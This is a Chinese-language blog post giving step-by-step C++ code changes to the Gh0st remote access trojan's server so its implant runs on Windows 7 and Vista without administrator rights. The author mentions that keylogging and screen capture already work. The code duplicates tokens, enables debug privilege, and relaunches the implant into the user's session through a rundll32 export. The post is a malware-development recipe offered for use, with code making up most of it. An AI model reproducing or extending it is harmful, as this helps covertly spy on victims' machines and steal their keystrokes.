以前的老文章了,做下记录吧,这两天帮朋友改一个Gh0st,在测试Win7功能的时候发现以前网上公布的方法不是很好兼容,虽然屏幕和键盘记录可以用,但是上线速度很慢,而且服务端不会自删除.更重要的是还得用管理员模式才能运行,反复找资料和测试.终于解决了Gh0st完美兼容Win7和Vista的问题,双击就可以运行,我尽量把笔记写的详细些.如果还有朋友不懂的话在这里留言,我看到会尽量帮大家解决.
打开server的until.cpp文件.在最后面#endif的上面加上下列代码
DWORD _stdcall LaunchAppIntoDifferentSession( LPTSTR lpCommand )
{
DWORD dwRet = 0;
PROCESS_INFORMATION pi;
STARTUPINFO si;
DWORD dwSessionId;
HANDLE hUserToken = NULL;
HANDLE hUserTokenDup = NULL;
HANDLE hPToken = NULL;
HANDLE hProcess = NULL;
DWORD dwCreationFlags;
HMODULE hInstKernel32 = NULL;
typedef DWORD (WINAPI *WTSGetActiveConsoleSessionIdPROC)();
WTSGetActiveConsoleSessionIdPROC WTSGetActiveConsoleSessionId = NULL;
hInstKernel32 = LoadLibrary("Kernel32.dll");
if (!hInstKernel32)
{
return FALSE;
}
WTSGetActiveConsoleSessionId = (WTSGetActiveConsoleSessionIdPROC)GetProcAddress(hInstKernel32,"WTSGetActiveConsoleSessionId");
// Log the client on to the local computer.
dwSessionId = WTSGetActiveConsoleSessionId();
do
{
WTSQueryUserToken( dwSessionId,&hUserToken );
dwCreationFlags = NORMAL_PRIORITY_CLASS | CREATE_NEW_CONSOLE;
ZeroMemory( &si, sizeof( STARTUPINFO ) );
si.cb= sizeof( STARTUPINFO );
si.lpDesktop = "winsta0default";
ZeroMemory( &pi, sizeof(pi) );
TOKEN_PRIVILEGES tp;
LUID luid;
if( !::OpenProcessToken( GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY
| TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY | TOKEN_ADJUST_SESSIONID
| TOKEN_READ | TOKEN_WRITE, &hPToken ) )
{
dwRet = GetLastError();
break;
}
else;
if ( !LookupPrivilegeValue( NULL, SE_DEBUG_NAME, &luid ) )
{
dwRet = GetLastError();
break;
}
else;
tp.PrivilegeCount =1;
tp.Privileges[0].Luid =luid;
tp.Privileges[0].Attributes =SE_PRIVILEGE_ENABLED;
if( !DuplicateTokenEx( hPToken, MAXIMUM_ALLOWED, NULL, SecurityIdentification, TokenPrimary, &hUserTokenDup ) )
{
dwRet = GetLastError();
break;
}
else;
//Adjust Token privilege
if( !SetTokenInformation( hUserTokenDup,TokenSessionId,(void*)&dwSessionId,sizeof(DWORD) ) )
{
dwRet = GetLastError();
break;
}
else;
if( !AdjustTokenPrivileges( hUserTokenDup, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, NULL ) )
{
dwRet = GetLastError();
break;
}
else;
LPVOID pEnv =NULL;
DWORD (__stdcall *CreateEnvironmentBlock)( LPVOID *, HANDLE, BOOL );
CreateEnvironmentBlock = (DWORD (__stdcall *)(LPVOID *, HANDLE,BOOL))GetProcAddress( LoadLibrary("UserEnv.dll"), "CreateEnvironmentBlock" );
if (!CreateEnvironmentBlock) break;
if( CreateEnvironmentBlock( &pEnv, hUserTokenDup, TRUE ) )
{
dwCreationFlags|=CREATE_UNICODE_ENVIRONMENT;
}
else pEnv=NULL;
// Launch the process in the client's logon session.
if( CreateProcessAsUser( hUserTokenDup, // client's access token
NULL, // file to execute
lpCommand, // command line
NULL, // pointer to process SECURITY_ATTRIBUTES
NULL, // pointer to thread SECURITY_ATTRIBUTES
FALSE, // handles are not inheritable
dwCreationFlags,// creation flags
pEnv, // pointer to new environment block
NULL, // name of current directory
&si, // pointer to STARTUPINFO structure
&pi // receives information about new process
) )
{
}
else
{
dwRet = GetLastError();
break;
}
}
while( 0 );
//Perform All the Close Handles task
if( NULL != hUserToken )
{
CloseHandle( hUserToken );
}
else;
if( NULL != hUserTokenDup)
{
CloseHandle( hUserTokenDup );
}
else;
if( NULL != hPToken )
{
CloseHandle( hPToken );
}
else;
return dwRet;
}
然后打开until.h 同样在最后面的#endif上面加上
DWORD _stdcall LaunchAppIntoDifferentSession( LPTSTR lpCommand );
然后打开svchost.cpp
搜索
extern "C" __declspec(dllexport) void ServiceMain( int argc, wchar_t* argv[] )
在上面加上
extern "C" __declspec(dllexport) void XiaoDeBu(HWND hwnd, HINSTANCE hinst, LPTSTR lpCmdLine, int nCmdShow )
{
main(lpCmdLine);
}
搜索
g_dwServiceType = QueryServiceTypeFromRegedit(svcname);
在下面加上
HANDLE hThread = NULL;
OSVERSIONINFO OsVerInfoEx;
OsVerInfoEx.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
GetVersionEx(&OsVerInfoEx);
if ( OsVerInfoEx.dwMajorVersion < 6 )//判断那种系统,如果小于6,直接用原来的代码
{
HANDLE hThread = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)main, (LPVOID)svcname, 0, NULL);
}
else
{
CHAR lpCommand[256];
CHAR Start[MAX_PATH];
GetModuleFileName(CKeyboardManager::g_hInstance,Start,sizeof(Start));
wsprintf(lpCommand,"rundll32.exe %s, XiaoDeBu %s",Start, svcname );
LaunchAppIntoDifferentSession(lpCommand);
}
然后把
HANDLE hThread = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)main, (LPVOID)svcname, 0, NULL);
这句注释掉.
